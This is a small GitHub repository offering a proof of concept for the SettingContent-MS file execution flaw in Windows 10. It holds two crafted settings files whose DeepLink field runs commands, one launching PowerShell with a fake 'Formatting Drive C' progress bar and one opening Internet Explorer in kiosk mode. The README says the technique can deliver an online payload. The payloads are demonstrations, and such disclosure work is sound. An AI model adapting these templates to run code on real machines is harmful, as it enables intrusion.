├── LoadPowershellDemo.SettingContent-MS
├── README.md
└── TestWebsite.SettingContent-MS-File


/LoadPowershellDemo.SettingContent-MS:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <PCSettings>
 3 |   <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
 4 |     <ApplicationInformation>
 5 |       <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
 6 |       <DeepLink>"%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" -c 
 7 | For ($i=0; $i -le 100; $i++) {Start-Sleep -Milliseconds 20
 8 |     Write-Progress -id 1 -Activity 'Formatting Drive C' -Status 'Current Count: $i' -PercentComplete $i -CurrentOperation 'Formatting ...'}</DeepLink>
 9 |       <Icon>%windir%\system32\control.exe</Icon>
10 |     </ApplicationInformation>
11 |     <SettingIdentity>
12 |       <PageID></PageID>
13 |       <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
14 |     </SettingIdentity>
15 |     <SettingInformation>
16 |       <Description>@shell32.dll,-4161</Description>
17 |       <Keywords>@shell32.dll,-4161</Keywords>
18 |     </SettingInformation>
19 |   </SearchableContent>
20 | </PCSettings>
21 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SettingContent-MS-File-Execution
 2 | SettingContent-MS File Execution vulnerability in Windows 10 <BR />
 3 | Proof of concept for SettingContent-MS File Execution Vulnerability in Windows 10 <BR />
 4 | Download and execute LoadWebsite.SettingContent-MS <BR />
 5 | Website will automatically load Internet Explorer, load a specific site and maximize the screen.
 6 | This can be used to leverage existing vulnerabilities in Internet Explorer or target via an online payload <BR />
 7 | Vulnerability first discovered by Matt Nelson  <BR />
 8 | Documented: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
 9 | 
10 | Created by: Brad Voris<BR />
11 | 
12 | 
13 | 
14 | 
15 | ## Connect with me at
16 | <A HREF="https://www.victimoftechnology.com">Victim Of Technology<A />
17 | <BR /><BR />
18 | <img alt="GitHub" src="https://img.shields.io/github/license/bvoris/SettingContent-MS-File-Execution"><img alt="GitHub commit activity" src="https://img.shields.io/github/commit-activity/m/bvoris/SettingContent-MS-File-Execution"><img alt="GitHub All Releases" src="https://img.shields.io/github/downloads/bvoris/SettingContent-MS-File-Execution/total"><img alt="GitHub repo size" src="https://img.shields.io/github/repo-size/bvoris/SettingContent-MS-File-Execution"><img alt="GitHub language count" src="https://img.shields.io/github/languages/count/bvoris/SettingContent-MS-File-Execution"><img alt="GitHub issues" src="https://img.shields.io/github/issues/bvoris/SettingContent-MS-File-Execution"><img alt="GitHub top language" src="https://img.shields.io/github/languages/top/bvoris/SettingContent-MS-File-Execution">
19 | 


--------------------------------------------------------------------------------
/TestWebsite.SettingContent-MS-File:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <PCSettings>
 3 |   <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
 4 |     <ApplicationInformation>
 5 |       <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
 6 |       <DeepLink>%windir%\system32\cmd.exe /c "C:\Program Files\Internet Explorer\iexplore.exe" -k https://www.victimoftechnology.com</DeepLink>
 7 |       <Icon>%windir%\system32\control.exe</Icon>
 8 |     </ApplicationInformation>
 9 |     <SettingIdentity>
10 |       <PageID></PageID>
11 |       <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
12 |     </SettingIdentity>
13 |     <SettingInformation>
14 |       <Description>@shell32.dll,-4161</Description>
15 |       <Keywords>@shell32.dll,-4161</Keywords>
16 |     </SettingInformation>
17 |   </SearchableContent>
18 | </PCSettings>
19 | 


--------------------------------------------------------------------------------